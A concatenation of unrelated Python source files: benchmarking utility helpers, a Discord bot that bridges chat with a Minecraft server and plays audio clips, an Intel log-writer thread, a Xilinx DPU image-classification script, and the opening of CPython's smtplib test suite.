return amount_in_units + f" {unit.name}"
def seconds_to_msec(seconds: float) -> float:
return seconds * MSECS_PER_SECOND
def seconds_to_usec(seconds: float) -> float:
return seconds * USECS_PER_SECOND
def msec_to_seconds(msec: float) -> float:
return msec / MSECS_PER_SECOND
def mhz_to_ghz(mhz: float) -> float:
return mhz / 1000
# Python's os.walk won't work, because it takes Strings and not paths.
# Unfortunately `Path(str(path))` isn't the identity if path is `//machine/`. (Python bug?)
def walk_files_recursive(path: Path, filter_dir: Callable[[Path], bool]) -> Iterable[Path]:
for sub in path.iterdir():
if sub.is_dir():
if filter_dir(sub):
for x in walk_files_recursive(sub, filter_dir):
yield x
else:
yield sub
def get_hostname() -> str:
return node()
# TODO:MOVE
def assert_admin() -> None:
if not is_admin():
raise Exception(
"PerfView requires you to be an administrator"
if os_is_windows()
else "cgcreate requires you to be a super user"
)
def is_admin() -> bool:
if os_is_windows():
# Do this import lazily as it is only available on Windows
from win32com.shell.shell import IsUserAnAdmin # pylint:disable=import-outside-toplevel
return IsUserAnAdmin()
else:
# Importing it this way since geteuid doesn't exist in windows and mypy complains there
geteuid = cast(Callable[[], int], getattr(os, "geteuid"))
return geteuid() == 0
def get_extension(path: Path) -> str:
return splitext(path.name)[1]
def add_extension(p: Path, ext: str) -> Path:
return p.parent / f"{p.name}.{ext}"
def remove_extension(p: Path) -> Path:
return p.parent / splitext(p.name)[0]
def change_extension(p: Path, ext: str) -> Path:
return add_extension(remove_extension(p), ext)
def get_or_did_you_mean(mapping: Mapping[str, V], key: str, name: str) -> V:
try:
return mapping[key]
except KeyError:
raise Exception(did_you_mean(tuple(mapping.keys()), key, name)) from None
def did_you_mean(
choices: Iterable[str], choice: str, name: str, show_choice: Callable[[str], str] = identity
) -> str:
assert choice not in choices
# Mypy has the return type of get_close_matches wrong?
close = check_cast(Sequence[str], get_close_matches(choice, choices)) # type: ignore
if is_empty(close):
choices = tuple(choices)
if len(choices) < 20:
return f"Bad {name} {show_choice(choice)}. Available: {tuple(choices)}"
else:
return f"Bad {name} {show_choice(choice)}."
elif len(close) == 1:
return f"Bad {name} {show_choice(choice)}. Did you mean {show_choice(close[0])}?"
else:
close_str = "\n".join(tuple(show_choice(c) for c in close))
return f"Bad {name} {show_choice(choice)}. Did you mean one of:\n{close_str}"
def hex_no_0x(i: int) -> str:
return remove_str_start(hex(i), "0x")
def try_parse_single_tag_from_xml_document(path: Path, tag_name: str) -> Optional[str]:
assert tag_name.startswith("{"), "Should start with schema"
root = parse_xml(str(path)).getroot()
tags = tuple(_iter_tag_recursive(root, tag_name))
if is_empty(tags):
return None
else:
assert len(tags) == 1 # Should only be specified once
tag = tags[0]
return tag.text
def _iter_tag_recursive(e: Element, tag_name: str) -> Iterable[Element]:
for child in e:
if child.tag == tag_name:
yield child
else:
yield from _iter_tag_recursive(child, tag_name)
# Note: WeakKeyDictionary does not seem to work on CLR types. So using this hack instead.
def lazy_property(obj: T, f: Callable[[T], U], name: Optional[str] = None) -> U:
if name is None:
# Mypy expects f to be a "FunctionType", but I don't know how to import that
name = f"{getfile(cast(Any, f))}/{f.__name__}"
res: Optional[U] = getattr(obj, name, None)
if res is None:
res = f(obj)
assert res is not None
setattr(obj, name, res)
return res
def opt_max(i: Iterable[float]) -> Optional[float]:
try:
return max(i)
except ValueError:
return None
def opt_median(i: Iterable[float]) -> Optional[float]:
try:
return median(i)
except StatisticsError:
return None
# numpy has problems on ARM, so using this instead.
def get_percentile(values: Sequence[float], percent: float) -> float:
assert not is_empty(values)
assert 0.0 <= percent <= 100.0
sorted_values = sorted(values)
fraction = percent / 100.0
index_and_fraction = (len(values) - 1) * fraction
prev_index = floor(index_and_fraction)
next_index = ceil(index_and_fraction)
# The closer we are to 'next_index', the more 'next' should matter
next_factor = index_and_fraction - prev_index
prev_factor = 1.0 - next_factor
return sorted_values[prev_index] * prev_factor + sorted_values[next_index] * next_factor
def get_95th_percentile(values: Sequence[float]) -> Result[str, float]:
return Err("<no values>") if is_empty(values) else Ok(get_percentile(values, 95))
def update_file(path: Path, text: str) -> None:
if (not path.exists()) or path.read_text(encoding="utf-8") != text:
print(f"Updating {path}")
path.write_text(text, encoding="utf-8")
# When we run a test with 'sudo', we need to make sure other users can access the file
def give_user_permissions(file: Path) -> None:
flags = S_IREAD | S_IWRITE | S_IRUSR | S_IWUSR | S_IRGRP | S_IWGRP | S_IROTH | S_IWOTH
file.chmod(flags)
def check_no_processes(names: Sequence[str]) -> None:
assert all(name.islower() for name in names)
for proc in process_iter():
for name in names:
suggestion = {
OS.posix: f"pkill -f {name}",
OS.windows: f'Get-Process | Where-Object {{$_.Name -like "{name}"}} | Stop-Process',
}[get_os()]
assert name not in proc.name().lower(), (
f"'{name}' is already running\n" + f"Try: `{suggestion}`"
)
def get_command_line() -> str:
return f"> py {' '.join(argv)}"
|
opurtbot_foreign.py
|
import discord
from discord.ext import tasks, commands
import asyncio
import threading
import subprocess
import time
from queue import Queue, Empty
from threading import Thread
from requests import get
import os
import re
chat_reg = re.compile("<[^ ]+>")
q = Queue()
inq = Queue() # queue for discord -> minecraft communication
outq = Queue() # queue for minecraft -> discord communication
active_players = set()
def enqueue(out, queue):
for line in iter(out.readline, b''):
queue.put(line)
out.close()
def run_minecraft(command):
p = subprocess.Popen(["java", "-jar","-Xmx11000M", "-Xms11000M", "forge-1.16.1-32.0.107.jar", "nogui"],
stdout=subprocess.PIPE,
stdin = subprocess.PIPE,
stderr=subprocess.STDOUT,
)
t = Thread(target = enqueue, args = (p.stdout, q))
t.daemon = True
t.start()
cc = 0
while True:
cc += 1
while not inq.empty():
# push commands into the subprocess
item = inq.get()
print(item)
if item['task'] == 'message-minecraft':
print(item)
command = 'tellraw @a {"text": "[%s] %s", "color" : "green"}' % (item['user'], item['message'].replace('\n', ' | '))
p.stdin.write((command + "\n").encode())
p.stdin.flush()
try:
line = q.get(timeout = 0.5)
if line == 'quit':
print("quit the minecraft thread")
p.kill ()
break;
line = line.decode()
print(line)
if "joined the game" in line:
end_idx = line.index(" joined the game")
start_idx = line.rindex(' ', 0, end_idx)
name = line[start_idx + 1: end_idx]
active_players.add(name)
outq.put({
"task" : "message-discord-joinleave",
"user" : name,
"message" : "%s joined the game 💎" % name
})
elif "left the game" in line:
end_idx = line.index(" left the game")
start_idx = line.rindex(' ', 0, end_idx)
name = line[start_idx + 1: end_idx]
active_players.remove(name)
outq.put({
"task" : "message-discord-joinleave",
"user" : name,
"message" : "%s left the game 🏃" % name
})
match = chat_reg.search(line)
if match:
print("found match!")
span = match.span()
user = line[span[0] + 1 : span[1] - 1]
message = line[span[1] + 1 : -2]
outq.put({
"task" : "message-discord",
"user" : user,
"message" : message
})
except:
if cc % 10 == 0:
print(".")
return
class SpinupThread (threading.Thread):
def __init__(self, ):
threading.Thread.__init__(self)
def run(self):
client = Spinup()
client.run(os.environ['DISCORD_TOKEN'])
class ServerThread (threading.Thread):
def __init__(self):
threading.Thread.__init__(self)
def run(self):
run_minecraft([])
class Spinup(discord.Client):
def __init__(self, sock):
super().__init__()
self.sock = sock
self.voting = False
self.voted = set()
self.running = False
self.upsince = 0
self.voteStarted = 0
self.voteChannel = None
self.locked = False
self.dimensional_rift = None
self.ip = None
self.vc = None
async def on_ready(self):
print('Logged on as {0}!'.format(self.user))
self.dimensional_rift = discord.utils.get(self.get_all_channels(), name = "dimensional-rift")
self.server_status = discord.utils.get(self.get_all_channels(), name = "server-status")
async def on_message(self, message):
print(message.author.id, message.channel.name, message.channel.id)
if message.channel.name == 'dimensional-rift':
# this is a message sent from minecraft
if (message.author == client.user) and message.content.startswith("```"):
return
inq.put({
"task" : 'message-minecraft',
"message" : message.content,
"user" : message.author.nick
})
if message.content.startswith('#purge'):
summary = {}
num = int(message.content.split(" ")[1])
if num > 10:
num = 10
num += 1
if 'admin' in [r.name for r in message.author.roles]:
history = await message.channel.history(limit = 100).flatten()
for m in history[:num]:
if m.author.display_name not in summary:
summary[m.author.display_name] = 1
else:
summary[m.author.display_name] += 1
summary_msg = ">>> "
for n in summary:
summary_msg += n + ": " + str(summary[n]) + "\n"
await message.channel.delete_messages(history[:num])
await message.channel.send(summary_msg)
# TODO: Put these in a dictionary or smth
if message.content == "!clipthat":
print(message.author.voice.channel)
try:
self.vc = await message.author.voice.channel.connect()
self.vc.play(
discord.FFmpegPCMAudio(executable = "C:/ffmpeg/bin/ffmpeg.exe", source = "./wardell_clipthat.mp3")
)
while self.vc.is_playing():
await asyncio.sleep(.1)
await self.vc.disconnect()
except discord.errors.ClientException:
await message.channel.send(
"opurtbot is already playing a clip"
)
if message.content == "!yessir":
print(message.author.voice.channel)
try:
self.vc = await message.author.voice.channel.connect()
self.vc.play(
discord.FFmpegPCMAudio(executable = "C:/ffmpeg/bin/ffmpeg.exe", source = "./wardell_yessir.mp3")
)
while self.vc.is_playing():
await asyncio.sleep(.1)
await self.vc.disconnect()
except discord.errors.ClientException:
await message.channel.send(
"opurtbot is already playing a clip"
)
if message.content == "!yooo":
print(message.author.voice.channel)
try:
self.vc = await message.author.voice.channel.connect()
self.vc.play(
discord.FFmpegPCMAudio(executable = "C:/ffmpeg/bin/ffmpeg.exe", source = "./csgo_niceknife.mp3")
)
while self.vc.is_playing():
await asyncio.sleep(.1)
await self.vc.disconnect()
except discord.errors.ClientException:
await message.channel.send(
"opurtbot is already playing a clip"
)
if message.content == '!bwaaa':
try:
self.vc = await message.author.voice.channel.connect()
self.vc.play(
discord.FFmpegPCMAudio(executable = "C:/ffmpeg/bin/ffmpeg.exe", source = "./victory.mp3")
)
while self.vc and self.vc.is_playing():
await asyncio.sleep(.1)
await self.vc.disconnect()
except discord.errors.ClientException:
await message.channel.send(
"opurtbot is already playing a clip"
)
if message.content == '!bwaa':
try:
self.vc = await message.author.voice.channel.connect()
self.vc.play(
discord.FFmpegPCMAudio(executable = "C:/ffmpeg/bin/ffmpeg.exe", source = "./imposter_victory.mp3")
)
while self.vc and self.vc.is_playing():
await asyncio.sleep(.1)
await self.vc.disconnect()
except discord.errors.ClientException:
await message.channel.send(
"opurtbot is already playing a clip"
)
if message.content == '!delib':
try:
self.vc = await message.author.voice.channel.connect()
self.vc.play(
discord.FFmpegPCMAudio(executable = "C:/ffmpeg/bin/ffmpeg.exe", source = "./naruto_deliberation.mp3")
)
while self.vc and self.vc.is_playing():
await asyncio.sleep(.1)
await self.vc.disconnect()
except discord.errors.ClientException:
await message.channel.send(
"opurtbot is already playing a clip"
)
elif message.content == '!!delib':
if self.vc:
await self.vc.disconnect()
self.vc = None
if message.content.startswith("!spinup"):
if self.voting:
await message.channel.send("you mf clown there's already an active vote")
elif self.running:
await message.channel.send("the server is already up u fool")
elif self.locked:
await message.channel.send("the server is locked! nathan's probably playing valorant...")
else:
if (message.author.id == 279456734773510145) and not message.content.endswith("nosudo"):
await self.spinup(message)
else:
await message.channel.send("starting vote, need 5 people to confirm. you have 3 MINUTES to vote [type `!yes` to vote, `!no` to cancel your existing vote]")
self.voteChannel = message.channel
self.voteStarted = time.time()
self.voting = True
self.voted = set()
elif message.content.startswith("!whois"):
if len(active_players):
res = "players currently on: \n```"
for p in active_players:
res += " - " + p + "\n"
await message.channel.send(res + "```")
else:
await message.channel.send("no one is on, hop in!")
elif message.content.startswith("!lock"):
if (message.author.id == 279456734773510145):
await message.channel.send("the server is locked and cannot be spun up")
self.locked = True
if self.voting:
await message.channel.send("the active vote has been cancelled")
self.voting = False
self.voted = set()
elif message.content.startswith("!unlock"):
if (message.author.id == 279456734773510145):
await message.channel.send("the server is unlocked can can be spun up")
self.locked = False
elif message.content.startswith("!help"):
await message.channel.send("""
`!spinup` - starts a vote to spin up the minecraft server, type `!yes` to vote, `!no` to cancel
`!spindown` - spins down the minecraft server, there is NO voting process
`!ip` - returns the IP address of the server
`!isup` - checks if the server is currently up/starting up
`!uptime` - returns the uptime of the server in seconds
""")
elif message.content.startswith("!yes"):
if message.author not in self.voted and self.voting:
self.voted.add(message.author)
await message.channel.send("%s out of 5 votes recorded" % len(self.voted))
if len(self.voted) == 5:
# spin up the mineraft server
await self.spinup(message)
elif message.content.startswith("!no"):
if message.author in self.voted and self.voting:
self.voted.remove(message.author)
await message.channel.send("%s out of 5 votes recorded" % len(self.voted))
elif message.content.startswith("!spindown"):
await message.channel.send("spinning down the minecraft server")
self.sock.emit('quit')
self.running = False
elif message.content.startswith("!isup"):
if self.running:
await message.channel.send("the server IS up")
else:
await message.channel.send("the server is NOT up")
elif message.content.startswith("!uptime"):
if self.running:
await message.channel.send("the server has been up for %s seconds" % ((time.time() - self.upsince)))
else:
await message.channel.send("the server is not currently up")
elif message.content.startswith("!ip"):
self.ip = get('https://api.ipify.org').text
await message.channel.send("`%s:25565`" % (get('https://api.ipify.org').text))
async def spinup(self, message):
await message.channel.send("vote succeeded, spinning up minecraft @ %s:25565" % (get('https://api.ipify.org').text))
self.ip = get('https://api.ipify.org').text
self.voting = False
self.voted = set()
if (not self.running):
m = ServerThread()
m.start()
self.running = True
self.upsince = time.time()
client = Spinup()
async def check_messages(ctx):
last_message = None
prev_topic = ""
while True:
if ctx.dimensional_rift and ctx.server_status:
if not last_message:
last_message = ctx.server_status.last_message_id
# set the topic of the chat
statuses = []
statuses.append("ON @ %s" % ctx.ip if ctx.running else "OFF")
statuses.append("LOCKED" if ctx.locked else "UNLOCKED")
if ctx.voting:
statuses.append("VOTING")
topic = "SERVER: "
for status in statuses:
topic += status + ", "
topic = topic[:-2]
if len(active_players) and ctx.running:
topic += " | "
for player in active_players:
topic += player + ", "
topic = topic[:-2]
elif len(active_players) == 0 and ctx.running:
topic += " | no one is on, hop on!"
if topic != prev_topic:
print("EDITING TOPIC: %s, %s" % (prev_topic, topic))
# delete the last message
if last_message:
try:
if type(last_message) == int:
msg = await ctx.server_status.fetch_message(last_message)
await msg.delete()
else:
await last_message.delete()
except Exception as e:
print(e)
last_message = await ctx.server_status.send(topic)
prev_topic = topic
if (time.time() - ctx.voteStarted) > 180 and ctx.voting:
ctx.voting = False
ctx.voted = set()
await ctx.voteChannel.send("sorry! the vote has ended, type `!spinup` to start another vote")
elif int(time.time() - ctx.voteStarted) == 120 and ctx.voting:
ctx.voteStarted -= 1 # this is so fucking janky. we only want this message sent once, so we rely on the 0.1 second resolution of the check_messages function. we subtract one from voteStarted to simulate a second of time passing, ensuring this message is only sent once.
await ctx.voteChannel.send("the vote will end in 1 MINUTE")
elif int(time.time() - ctx.voteStarted) == 60 and ctx.voting:
ctx.voteStarted -= 1
await ctx.voteChannel.send("the vote will end in 2 MINUTES")
while not outq.empty():
item = outq.get()
if item['task'] == 'message-discord':
#channel = discord.utils.get(ctx.get_all_channels(), name = "dimensional-rift")
#print(channel)
if not item['message'].endswith("Disconnected"):
await ctx.dimensional_rift.send("```diff\n+ <%s> %s```" % (item['user'], item['message']))
elif item['task'] == 'message-discord-joinleave':
user = item['user']
message = item['message']
await ctx.dimensional_rift.send(message)
await asyncio.sleep(0.1)
client.loop.create_task(check_messages(client))
client.run(os.environ['DISCORD_TOKEN'])
|
MptaWriterThread.py
|
"""
Copyright (C) 2018 Intel Corporation
Licensed under the Apache License, Version 2.0 (the "License");
you may not use this file except in compliance with the License.
You may obtain a copy of the License at
http://www.apache.org/licenses/LICENSE-2.0
Unless required by applicable law or agreed to in writing,
software distributed under the License is distributed on an "AS IS" BASIS,
WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
See the License for the specific language governing permissions
and limitations under the License.
SPDX-License-Identifier: Apache-2.0
"""
import Queue
import threading
BIN_EXT = '.bin'
class MptaWriterThread(object):
def __init__(self):
# Internal buffer
self.__queue = Queue.Queue()
# Writer thread stop condition
self._stop_event = threading.Event()
self.__writer_thread = None
self.__bin_filename = ''
self.__file = None
self.__filename = None
self.__start_writting = False
def set_output_file(self, filename):
self.__filename = filename
return
def start(self):
self._stop_event.clear()
self.__writer_thread = threading.Thread(target=self.__run)
self.__writer_thread.name = "MptaWriterThread"
self.__writer_thread.daemon = True
self.__writer_thread.start()
def stop(self):
self._stop_event.set()
if self.__writer_thread is not None:
try:
self.__writer_thread.join(30)
except (KeyboardInterrupt, SystemExit):
raise
except BaseException: # pylint: disable=W0703
pass
finally:
del self.__writer_thread
self.__writer_thread = None
return
def push(self, line):
self.__queue.put_nowait(line)
def __run(self):
# get output file name
self.__bin_filename = self.__filename + BIN_EXT
try:
self.__file = open(self.__bin_filename, 'wb')
except (KeyboardInterrupt, SystemExit):
raise
except BaseException:
# raise MptaLoggerThreadError(-1, "MptaLoggerThread file creation failed")
pass
self.__start_writting = True
while not self._stop_event.is_set():
while not self.__queue.empty():
line = self.__queue.get_nowait()
if len(line) > 0 and self.__file is not None:
self.__file.write(line)
self.__file.flush()
self._stop_event.wait(1)
# close log file
if self.__file is not None:
self.__file.flush()
self.__file.close()
self.__file = None
return
|
classification.py
|
'''
Copyright 2019 Xilinx Inc.
Licensed under the Apache License, Version 2.0 (the "License");
you may not use this file except in compliance with the License.
You may obtain a copy of the License at
http://www.apache.org/licenses/LICENSE-2.0
Unless required by applicable law or agreed to in writing, software
distributed under the License is distributed on an "AS IS" BASIS,
WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
See the License for the specific language governing permissions and
limitations under the License.
'''
# code inspired by VAI 1.3 VART inception_v1_mt_py
from ctypes import *
from typing import List
import cv2
import numpy as np
import vart
import xir
import pathlib
import os
import math
import threading
import time
import sys
import argparse
#######################################################################################################
#Size of images
IMAGE_WIDTH = 256
IMAGE_HEIGHT = 256
#number of classes
NUM_CLASSES = 2
classes = ["cat", "dog"]
#######################################################################################################
_R_MEAN = 124.45967
_G_MEAN = 116.04212
_B_MEAN = 106.40268
MEANS = [_B_MEAN,_G_MEAN,_R_MEAN]
def resize_shortest_edge(image, size):
H, W = image.shape[:2]
if H >= W:
nW = size
nH = int(float(H)/W * size)
else:
nH = size
nW = int(float(W)/H * size)
return cv2.resize(image,(nW,nH))
def mean_image_subtraction(image, means):
B, G, R = cv2.split(image)
B = B - means[0]
G = G - means[1]
R = R - means[2]
image = cv2.merge([B, G, R])
return image
def BGR2RGB(image):
B, G, R = cv2.split(image)
image = cv2.merge([R, G, B])
return image
def central_crop(image, crop_height, crop_width):
image_height = image.shape[0]
image_width = image.shape[1]
offset_height = (image_height - crop_height) // 2
offset_width = (image_width - crop_width) // 2
return image[offset_height:offset_height + crop_height, offset_width:
offset_width + crop_width, :]
def preprocess_fn(image_path, crop_height = 256, crop_width = 256):
image = cv2.imread(image_path)
#image = cv2.cvtColor(image, cv2.COLOR_BGR2RGB)
#image = BGR2RGB(image)
#image = resize_shortest_edge(image, 256)
#image = central_crop(image, crop_height, crop_width)
image = mean_image_subtraction(image, MEANS)
return image
#######################################################################################################
def get_script_directory():
path = os.getcwd()
return path
def CPUCalcSoftmax(data,size):
'''
Calculate softmax
data: data to be calculated
size: data size
return: softamx result
'''
sum=0.0
result = [0 for i in range(size)]
for i in range(size):
result[i] = math.exp(data[i])
sum +=result[i]
for i in range(size):
result[i] /=sum
return result
def TopK(datain,size,filePath):
'''
Get topk results according to its probability
datain: data result of softmax
filePath: filePath in witch that records the infotmation of kinds
'''
cnt=[i for i in range(size) ]
pair=zip(datain,cnt)
pair=sorted(pair,reverse=True)
softmax_new,cnt_new=zip(*pair)
fp=open(filePath, "r")
data1=fp.readlines()
fp.close()
for i in range(2):
flag=0
for line in data1:
if flag==cnt_new[i]:
print("Top[%d] %f %s" %(i, (softmax_new[i]),(line.strip)("\n")))
flag=flag+1
#######################################################################################################
SCRIPT_DIR = get_script_directory()
def CPUCalcArgmax(data):
'''
returns index of highest value in data
'''
return np.argmax(data)
#######################################################################################################
def runDPU(id,start,dpu:"Runner",img):
'''get tensor'''
inputTensors = dpu.get_input_tensors()
outputTensors = dpu.get_output_tensors()
input_ndim = tuple(inputTensors[0].dims)
output_ndim = tuple(outputTensors[0].dims)
batchSize = input_ndim[0]
n_of_images = len(img)
count = 0
write_index = start
while count < n_of_images:
if (count+batchSize<=n_of_images):
runSize = batchSize
else:
runSize=n_of_images-count
'''prepare batch input/output '''
outputData = []
inputData = []
inputData = [np.empty(input_ndim, dtype=np.float32, order="C")]
outputData = [np.empty(output_ndim, dtype=np.float32, order="C")]
'''init input image to input buffer '''
for j in range(runSize):
imageRun = inputData[0]
imageRun[j, ...] = img[(count + j) % n_of_images].reshape(input_ndim[1:])
'''run with batch '''
job_id = dpu.execute_async(inputData,outputData)
dpu.wait(job_id)
'''store output vectors '''
for j in range(runSize):
out_q[write_index] = CPUCalcArgmax(outputData[0][j])
write_index += 1
count = count + runSize
def get_child_subgraph_dpu(graph: "Graph") -> List["Subgraph"]:
assert graph is not None, "'graph' should not be None."
root_subgraph = graph.get_root_subgraph()
assert (
root_subgraph is not None
), "Failed to get root subgraph of input Graph object."
if root_subgraph.is_leaf:
return []
child_subgraphs = root_subgraph.toposort_child_subgraph()
assert child_subgraphs is not None and len(child_subgraphs) > 0
return [
cs
for cs in child_subgraphs
if cs.has_attr("device") and cs.get_attr("device").upper() == "DPU"
]
def app(image_dir, threads, model, use_post_proc):
'''
main application function
'''
listimage=os.listdir(image_dir)
#print(listimage)
runTotal = len(listimage)
print('Found',len(listimage),'images - processing',runTotal,'of them')
''' global list that all threads can write results to '''
global out_q
out_q = [None] * runTotal
all_dpu_runners = []
''' get a list of subgraphs from the compiled model file '''
g = xir.Graph.deserialize(model) #(pathlib.Path(model))
subgraphs = get_child_subgraph_dpu(g)
assert len(subgraphs) == 1 # only one DPU kernel
print('Found',len(subgraphs),'subgraphs in',model)
for i in range(threads):
# make a runner for each thread, give it a subgraph to execute
all_dpu_runners.append(vart.Runner.create_runner(subgraphs[0], "run"))
''' preprocess images '''
img = []
for i in range(runTotal):
path = os.path.join(image_dir,listimage[i])
img.append(preprocess_fn(path))
''' create threads
Each thread receives a section of the preprocessed images list as input and
will write results into the corresponding section of the global out_q list.
'''
threadAll = []
start=0
for i in range(threads):
# divide the list of preprocessed images across the threads
if (i==threads-1):
end = len(img)
else:
end = start+(len(img)//threads)
in_q = img[start:end]
t1 = threading.Thread(target=runDPU, args=(i,start,all_dpu_runners[i], in_q))
threadAll.append(t1)
start=end
time1 = time.time()
for x in threadAll:
x.start()
for x in threadAll:
x.join()
time2 = time.time()
timetotal = time2 - time1
fps = float(runTotal / timetotal)
print(" ")
print("FPS=%.2f, total frames = %.0f , time=%.4f seconds" %(fps,runTotal, timetotal))
print(" ")
del all_dpu_runners
''' post-processing '''
if (use_post_proc == 1):
correct = 0
wrong = 0
for i in range(len(out_q)):
#print("image number ", i)
#inp_img = (in_q[i] + 0.5) * 255.0
#cv2.imshow("Image", np.uint8(inp_img));
#cv2.waitKey(10);
prediction = classes[out_q[i]]
#print(listimage[i])
ground_truth = listimage[i].split(".")[0]
if (ground_truth==prediction):
correct += 1
else:
wrong += 1
accuracy = correct/len(out_q)
print('Correct:', correct,'Wrong:', wrong,'Accuracy:', accuracy)
#######################################################################################################
# only used if script is run as 'main' from command line
def main():
# construct the argument parser and parse the arguments
ap = argparse.ArgumentParser()
ap.add_argument('-d', '--images', type=str, default="./test_images/", help='Path to folder of test images')
ap.add_argument('-t', '--threads', type=int, default=1, help='Number of threads. Default is 1')
ap.add_argument('-m', '--model', type=str, help='Path of elf file')
ap.add_argument('-p', '--postpr', type=int, default=0, help='use postProcessing: YES (1), NO (0). Default is NO')
args = ap.parse_args()
print('Command line options:')
print(' --images : ', args.images)
print(' --threads : ', args.threads)
print(' --model : ', args.model)
print(' --postpr : ', args.postpr)
app(args.images,args.threads,args.model, args.postpr)
#######################################################################################################
if __name__ == '__main__':
main()
|
test_smtplib.py
|
import asyncore
import email.mime.text
import email.utils
import socket
import smtpd
import smtplib
import io
import re
import sys
import time
import select
import errno
import base64
import unittest
from test import support, mock_socket
try:
import threading
except ImportError:
threading = None
HOST = support.HOST
if sys.platform == 'darwin':
# select.poll returns a select.POLLHUP at the end of the tests
# on darwin, so just ignore it
def handle_expt(self):
pass
smtpd.SMTPChannel.handle_expt = handle_expt
def server(evt, buf, serv):
serv.listen()
evt.set()
try:
conn, addr = serv.accept()
except socket.timeout:
pass
else:
n = 500
while buf and n > 0:
r, w, e = select.select([], [conn], [])
if w:
sent = conn.send(buf)
buf = buf[sent:]
n -= 1
conn.close()
finally:
serv.close()
evt.set()
class GeneralTests(unittest.TestCase):
def setUp(self):
smtplib.socket = mock_socket
self.port = 25
def tearDown(self):
smtplib.socket = socket
# This method is no longer used but is retained for backward compatibility,
# so test to make sure it still works.
def testQuoteData(self):
teststr = "abc\n.jkl\rfoo\r\n..blue"
expected = "abc\r\n..jkl\r\nfoo\r\n...blue"
self.assertEqual(expected, smtplib.quotedata(teststr))
def testBasic1(self):
mock_socket.reply_with(b"220 Hola mundo")
# connects
smtp = smtplib.SMTP(HOST, self.port)
smtp.close()
def testSourceAddress(self):
mock_socket.reply_with(b"220 Hola mundo")
# connects
smtp = smtplib.SMTP(HOST, self.port,
source_address=('127.0.0.1',19876))
self.assertEqual(smtp.source_address, ('127.0.0.1', 19876))
smtp.close()
def testBasic2(self):
mock_socket.reply_with(b"220 Hola mundo")
# connects, include port in host name
smtp = smtplib.SMTP("%s:%s" % (HOST, self.port))
smtp.close()
def testLocalHostName(self):
mock_socket.reply_with(b"220 Hola mundo")
# check that supplied local_hostname is used
smtp = smtplib.SMTP(HOST, self.port, local_hostname="testhost")
self.assertEqual(smtp.local_hostname, "testhost")
smtp.close()
def testTimeoutDefault(self):
mock_socket.reply_with(b"220 Hola mundo")
self.assertIsNone(mock_socket.getdefaulttimeout())
mock_socket.setdefaulttimeout(30)
self.assertEqual(mock_socket.getdefaulttimeout(), 30)
try:
smtp = smtplib.SMTP(HOST, self.port)
finally:
mock_socket.setdefaulttimeout(None)
self.assertEqual(smtp.sock.gettimeout(), 30)
smtp.close()
def testTimeoutNone(self):
mock_socket.reply_with(b"220 Hola mundo")
self.assertIsNone(socket.getdefaulttimeout())
socket.setdefaulttimeout(30)
try:
smtp = smtplib.SMTP(HOST, self.port, timeout=None)
finally:
socket.setdefaulttimeout(None)
self.assertIsNone(smtp.sock.gettimeout())
smtp.close()
def testTimeoutValue(self):
mock_socket.reply_with(b"220 Hola mundo")
smtp = smtplib.SMTP(HOST, self.port, timeout=30)
self.assertEqual(smtp.sock.gettimeout(), 30)
smtp.close()
# Test server thread using the specified SMTP server class
def debugging_server(serv, serv_evt, client_evt):
serv_evt.set()
try:
if hasattr(select, 'poll'):
poll_fun = asyncore.poll2
else:
poll_fun = asyncore.poll
n = 1000
while asyncore.socket_map and n > 0:
poll_fun(0.01, asyncore.socket_map)
# when the client conversation is finished, it will
# set client_evt, and it's then ok to kill the server
if client_evt.is_set():
serv.close()
break
n -= 1
except socket.timeout:
pass
finally:
if not client_evt.is_set():
# allow some time for the client to read the result
time.sleep(0.5)
serv.close()
asyncore.close_all()
serv_evt.set()
MSG_BEGIN = '---------- MESSAGE FOLLOWS ----------\n'
MSG_END = '------------ END MESSAGE ------------\n'
# NOTE: Some SMTP objects in the tests below are created with a non-default
# local_hostname argument to the constructor, since (on some systems) the FQDN
# lookup caused by the default local_hostname sometimes takes so long that the
# test server times out, causing the test to fail.
# Test behavior of smtpd.DebuggingServer
@unittest.skipUnless(threading, 'Threading required for this test.')
class DebuggingServerTests(unittest.TestCase):
maxDiff = None
def setUp(self):
self.real_getfqdn = socket.getfqdn
socket.getfqdn = mock_socket.getfqdn
# temporarily replace sys.stdout to capture DebuggingServer output
self.old_stdout = sys.stdout
self.output = io.StringIO()
sys.stdout = self.output
self.serv_evt = threading.Event()
self.client_evt = threading.Event()
# Capture SMTPChannel debug output
self.old_DEBUGSTREAM = smtpd.DEBUGSTREAM
smtpd.DEBUGSTREAM = io.StringIO()
# Pick a random unused port by passing 0 for the port number
self.serv = smtpd.DebuggingServer((HOST, 0), ('nowhere', -1),
decode_data=True)
# Keep a note of what port was assigned
self.port = self.serv.socket.getsockname()[1]
serv_args = (self.serv, self.serv_evt, self.client_evt)
self.thread = threading.Thread(target=debugging_server, args=serv_args)
self.thread.start()
# wait until server thread has assigned a port number
self.serv_evt.wait()
self.serv_evt.clear()
def tearDown(self):
socket.getfqdn = self.real_getfqdn
# indicate that the client is finished
self.client_evt.set()
# wait for the server thread to terminate
self.serv_evt.wait()
self.thread.join()
# restore sys.stdout
sys.stdout = self.old_stdout
# restore DEBUGSTREAM
smtpd.DEBUGSTREAM.close()
smtpd.DEBUGSTREAM = self.old_DEBUGSTREAM
def testBasic(self):
# connect
smtp = smtplib.SMTP(HOST, self.port, local_hostname='localhost', timeout=3)
smtp.quit()
def testSourceAddress(self):
# connect
port = support.find_unused_port()
try:
smtp = smtplib.SMTP(HOST, self.port, local_hostname='localhost',
timeout=3, source_address=('127.0.0.1', port))
self.assertEqual(smtp.source_address, ('127.0.0.1', port))
self.assertEqual(smtp.local_hostname, 'localhost')
smtp.quit()
except OSError as e:
if e.errno == errno.EADDRINUSE:
self.skipTest("couldn't bind to port %d" % port)
raise
def testNOOP(self):
smtp = smtplib.SMTP(HOST, self.port, local_hostname='localhost', timeout=3)
expected = (250, b'OK')
self.assertEqual(smtp.noop(), expected)
smtp.quit()
def testRSET(self):
smtp = smtplib.SMTP(HOST, self.port, local_hostname='localhost', timeout=3)
expected = (250, b'OK')
self.assertEqual(smtp.rset(), expected)
smtp.quit()
def testELHO(self):
# EHLO isn't implemented in DebuggingServer
smtp = smtplib.SMTP(HOST, self.port, local_hostname='localhost', timeout=3)
expected = (250, b'\nSIZE 33554432\nHELP')
self.assertEqual(smtp.ehlo(), expected)
smtp.quit()
def testEXPNNotImplemented(self):
# EXPN isn't implemented in DebuggingServer
